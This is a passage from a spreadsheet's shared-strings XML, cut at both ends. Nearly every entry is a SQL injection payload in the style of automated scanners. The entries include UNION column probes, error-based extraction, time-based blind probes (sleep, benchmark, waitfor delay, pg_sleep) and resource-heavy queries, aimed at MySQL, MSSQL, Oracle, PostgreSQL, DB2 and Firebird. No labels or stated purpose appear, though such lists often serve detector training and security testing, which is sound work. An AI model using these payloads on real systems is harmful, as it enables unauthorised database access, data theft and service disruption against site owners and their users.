    <t>1"  )  )   as lfte where 3811 = 3811 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>1 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) -- btqa</t>
  </si>
  <si>
    <t>1'+ ( select lgkd where 7801 = 7801 and elt ( 4249 = 4249,7259  )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</si>
  <si>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</si>
  <si>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   as qrrx where 4633 = 4633 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-4764 )  where 8200 = 8200 union all select 8200,8200,8200,8200--</t>
  </si>
  <si>
    <t>-6855' )  or 8519 = 9248</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1" )  where 3250 = 3250 union all select null#</t>
  </si>
  <si>
    <t>-4798"  )  )   )  union all select 7892,7892,7892,7892,7892,7892,7892,7892,7892,7892#</t>
  </si>
  <si>
    <t>1%' and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and '%' = '</t>
  </si>
  <si>
    <t>1" or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and "xqgt" like "xqgt</t>
  </si>
  <si>
    <t>1' and elt ( 1533 = 5695,5695 )  and 'ycgi' = 'ycgi</t>
  </si>
  <si>
    <t>1' )  where 6387 = 6387 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   and elt ( 7633 = 4110,4110 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>-9937'  )  )   union all select 3900,3900,3900,3900,3900,3900,3900,3900,3900#</t>
  </si>
  <si>
    <t>1 )  where 5550 = 5550  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>1 )  as phja where 4627 = 4627</t>
  </si>
  <si>
    <t>-9947"  )  )   )  union all select 8765,8765,8765,8765,8765#</t>
  </si>
  <si>
    <t>1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and 'kudh' like 'kudh</t>
  </si>
  <si>
    <t>1'  )  )   as fusi where 2788 = 2788 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>select  ( case when  ( 2968 = 2021 )  then 1 else 2968* ( select 2968 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>-4681 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||</t>
  </si>
  <si>
    <t>1"  )  )   as xwrq where 4161 = 4161</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 2840 = 3788,1,1/0 ) </t>
  </si>
  <si>
    <t xml:space="preserve">-5299 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  </t>
  </si>
  <si>
    <t>1' where 8969 = 8969 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1 or elt ( 6272 = 6272,sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1' in boolean mode )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' )  as bdei where 9531 = 9531 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-9557 )  where 2891 = 2891 union all select 2891,2891,2891,2891,2891,2891,2891,2891,2891--</t>
  </si>
  <si>
    <t>1" )  and  ( 4085 = 4885 ) *4885 and  ( "sxte" = "sxte</t>
  </si>
  <si>
    <t>1"  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  "njdx" like "njdx</t>
  </si>
  <si>
    <t>if ( 2643 = 1393 )  select 2643 else drop function nqss--</t>
  </si>
  <si>
    <t>1" )  as ivuv where 5691 = 5691</t>
  </si>
  <si>
    <t>1 where 5332 = 5332 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>-8609' union all select 9384,9384,9384,9384--</t>
  </si>
  <si>
    <t>1  )  )   as vcvn where 2106 = 2106</t>
  </si>
  <si>
    <t>1" )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1"  )  )   and elt ( 3785 = 9386,9386 )  and   (  (  "inwa" like "inwa</t>
  </si>
  <si>
    <t>1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) # urzg</t>
  </si>
  <si>
    <t>-4210" )  where 2679 = 2679 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) |</t>
  </si>
  <si>
    <t>select  ( case when  ( 8208 = 7960 )  then 8208 else 8208* ( select 8208 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1" rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and "wcze" = "wcze</t>
  </si>
  <si>
    <t>-5496 union all select 2099,2099,2099#</t>
  </si>
  <si>
    <t>1'  )  )   and 3526 = 1354</t>
  </si>
  <si>
    <t>1'|| ( select 'ymre' where 8681 = 8681</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "jwzy" = "jwzy</t>
  </si>
  <si>
    <t>-2790' )  as xhct where 5756 = 5756 union all select 5756,5756#</t>
  </si>
  <si>
    <t xml:space="preserve">1" or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) </t>
  </si>
  <si>
    <t>1"  )  )   and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  "uglh" like "uglh</t>
  </si>
  <si>
    <t>1  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  3366 = 3366</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>-4965 )  as imga where 3705 = 3705 union all select 3705--</t>
  </si>
  <si>
    <t>-8294%' union all select 8728,8728,8728,8728,8728,8728,8728,8728,8728,8728#</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 7711 = 7711 )  then 1 else 7711* ( select 7711 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 7734 = 7734 )  then  ( select benchmark ( 5000000,md5 ( 0x72747341  )  )   )  else 7734* ( select 7734 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>-9771' or 5113 = 5365</t>
  </si>
  <si>
    <t>1'|| ( select 'wcad' from dual where 4262 = 4262 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-5520"  )  )   as utqk where 7762 = 7762 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||ch</t>
  </si>
  <si>
    <t>1'  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'rgyc' = 'rgyc</t>
  </si>
  <si>
    <t>1  )  )   as xzcl where 2332 = 2332</t>
  </si>
  <si>
    <t>-8875" )  where 8428 = 8428 or 1519 = 5756--</t>
  </si>
  <si>
    <t>1" and  ( 3020 = 3020 ) *6703 and "tnzp" like "tnzp</t>
  </si>
  <si>
    <t>-5360' where 8178 = 8178 union all select 8178,8178,8178--</t>
  </si>
  <si>
    <t>-6987' union all select 4721,4721--</t>
  </si>
  <si>
    <t xml:space="preserve"> end-- elvi</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select bptu where 7356 = 7356  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )    )  )  +'</t>
  </si>
  <si>
    <t xml:space="preserve">1' or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) </t>
  </si>
  <si>
    <t>1'  )  )   and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  'ajka' = 'ajka</t>
  </si>
  <si>
    <t>1 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) # miji</t>
  </si>
  <si>
    <t>-6770'  )  )   union all select 1845,1845,1845,1845,1845,1845,1845,1845,1845#</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and  ( 'atyf' = 'atyf</t>
  </si>
  <si>
    <t>select  ( case when  ( 9376 = 4521 )  then 1 else 9376* ( select 9376 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1"  )  )   )  and elt ( 2421 = 9612,9612 )  and   (  (   ( "gbdx" like "gbdx</t>
  </si>
  <si>
    <t>-1275" union all select 7861,7861,7861,7861,7861#</t>
  </si>
  <si>
    <t>1' )  where 8142 = 8142 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1"  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( "znzb" like "znzb</t>
  </si>
  <si>
    <t>1" )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( "ccuy" = "ccuy</t>
  </si>
  <si>
    <t>1' )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 'lwlh' = 'lwlh</t>
  </si>
  <si>
    <t>1'  )  )   as tgso where 1349 = 1349 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select niht where 7294 = 7294 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-1235"  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||ch</t>
  </si>
  <si>
    <t>1" )  where 7957 = 7957 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1' )  where 6222 = 6222 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>-7418 union all select 1340,1340,1340,1340,1340#</t>
  </si>
  <si>
    <t>-4015'|| ( select 'qeqv' from dual where 1437 = 1437 union all select 1437,1437,1437,1437,1437,1437,1437,1437,1437#</t>
  </si>
  <si>
    <t>1' and 4595 = 4595#</t>
  </si>
  <si>
    <t>1%'  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   order by 1#</t>
  </si>
  <si>
    <t>1"  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  "mjkl" = "mjkl</t>
  </si>
  <si>
    <t>1" )  as vzdq where 3160 = 3160</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (  'rnzp' = 'rnzp</t>
  </si>
  <si>
    <t>-1256' in boolean mode )  union all select 7889,7889,7889,7889,7889,7889,7889,7889,7889--</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 4460 = 2665,2665 )  and   (  (  'qmzu' = 'qmzu</t>
  </si>
  <si>
    <t>1  )  )   )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' where 2964 = 2964 union all select null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1' and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) </t>
  </si>
  <si>
    <t>-9166" )  as hlre where 4768 = 4768 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>-8797"  )  )   order by 1#</t>
  </si>
  <si>
    <t>1 where 4372 = 4372</t>
  </si>
  <si>
    <t>1'+ ( select 'mxei' where 7811 = 7811 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-1550' in boolean mode )  union all select 9777,9777,9777--</t>
  </si>
  <si>
    <t>-1368  )  )   union all select 1310,1310,1310,1310,1310#</t>
  </si>
  <si>
    <t>-5438" )  union all select 3170,3170--</t>
  </si>
  <si>
    <t>-4736'  )  )   or elt ( 5835 = 5509,5509 )  and   (  (  'iawg' = 'iawg</t>
  </si>
  <si>
    <t>1'  )  )   as ylyq where 2953 = 2953 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-7951'  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +cha</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'uedy' where 8816 = 8816</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'ckfn' like 'ckfn</t>
  </si>
  <si>
    <t>1 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) # vojr</t>
  </si>
  <si>
    <t>1 where 7464 = 7464 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>-3261"  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 )</t>
  </si>
  <si>
    <t>1" )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' )  where 6489 = 6489 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>-7901 )  order by 1--</t>
  </si>
  <si>
    <t>-3438" )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122</t>
  </si>
  <si>
    <t>-8894%"  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 )</t>
  </si>
  <si>
    <t>1%"  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1" where 4445 = 4445 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>1' )  as dqgr where 2427 = 2427 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>select  ( case when  ( 1227 = 4014 )  then 1227 else 1227* ( select 1227 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  -- sbvl</t>
  </si>
  <si>
    <t>1" and 7533 = 7533 and "dqjp" = "dqjp</t>
  </si>
  <si>
    <t xml:space="preserve"> ( 8266 = 8266 ) *9900</t>
  </si>
  <si>
    <t>1'  )  )   and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 )  where 8813 = 8813</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  "dmgj" = "dmgj</t>
  </si>
  <si>
    <t>-4993" union all select 6959,6959,6959--</t>
  </si>
  <si>
    <t>1" )  where 3084 = 3084 union all select null,null--</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) #</t>
  </si>
  <si>
    <t>1"  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  "qyew" = "qyew</t>
  </si>
  <si>
    <t>1%" )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1' or sleep ( 5 )  and 'udqz' = 'udqz</t>
  </si>
  <si>
    <t xml:space="preserve">-7324 )  or make_set ( 8486 = 6544,6544 ) </t>
  </si>
  <si>
    <t>-9005 union all select 4410#</t>
  </si>
  <si>
    <t>1 where 2301 = 2301</t>
  </si>
  <si>
    <t>-4882' order by 1#</t>
  </si>
  <si>
    <t>1" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "gxhz" = "gxhz</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' ) +'</t>
  </si>
  <si>
    <t xml:space="preserve">-6263%"  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr </t>
  </si>
  <si>
    <t>-3378%"  )  )   union all select 9357,9357,9357,9357,9357--</t>
  </si>
  <si>
    <t>-2715'  )  )   or 6942 = 1636 and   (  (  'mqeq' = 'mqeq</t>
  </si>
  <si>
    <t>1%' )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1'|| ( select 'eamo' where 4958 = 4958 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5  )  )  ||'</t>
  </si>
  <si>
    <t>1'  )  )   as uizu where 1774 = 1774</t>
  </si>
  <si>
    <t>-7007 )  union all select 6704,6704--</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null--</t>
  </si>
  <si>
    <t>-6412%' or 4065 = 5815 and '%' = '</t>
  </si>
  <si>
    <t>1%" waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t xml:space="preserve">1 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) </t>
  </si>
  <si>
    <t>1' )  where 2725 = 2725 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1%" )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   as ngvf where 9912 = 9912 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 9986 = 8342 )  then 9986 else 9986* ( select 9986 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1' )  and 2006 = 2006</t>
  </si>
  <si>
    <t>-7083 union all select 7705,7705,7705,7705,7705#</t>
  </si>
  <si>
    <t>1'+ ( select nxfp where 5006 = 5006</t>
  </si>
  <si>
    <t>-9098' union all select 3476,3476,3476,3476,3476,3476#</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and elt ( 4249 = 4249,7259 ) </t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' where 8430 = 8430 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null#</t>
  </si>
  <si>
    <t>1' )  as tuhc where 4018 = 4018 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'+ ( select emeu where 2310 = 2310</t>
  </si>
  <si>
    <t>1" )  as dezr where 2145 = 2145 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>select  ( case when  ( 8663 = 7467 )  then 8663 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1%'  )  )   waitfor delay '0:0:5' and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-1879%'  )  )   or 3038 = 3038</t>
  </si>
  <si>
    <t>1 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) # aetd</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  "hxdd" = "hxdd</t>
  </si>
  <si>
    <t>1%"  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1%'  )  )   and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'jfxs' from dual where 5485 = 5485 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( "yopd" like "yopd</t>
  </si>
  <si>
    <t>-5039 union all select 2114#</t>
  </si>
  <si>
    <t>1' )  where 4277 = 4277 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and 7533 = 7533 and   (  (   ( "alvd" like "alvd</t>
  </si>
  <si>
    <t>select  ( case when  ( 6179 = 8476 )  then 6179 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1" )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' )  where 6988 = 6988 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1' rlike  ( select  ( case when  ( 5384 = 7060 )  then 1 else 0x28 end  )  )  </t>
  </si>
  <si>
    <t>1%"  )  )   )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1%"  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1 )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( 8450 = 8450</t>
  </si>
  <si>
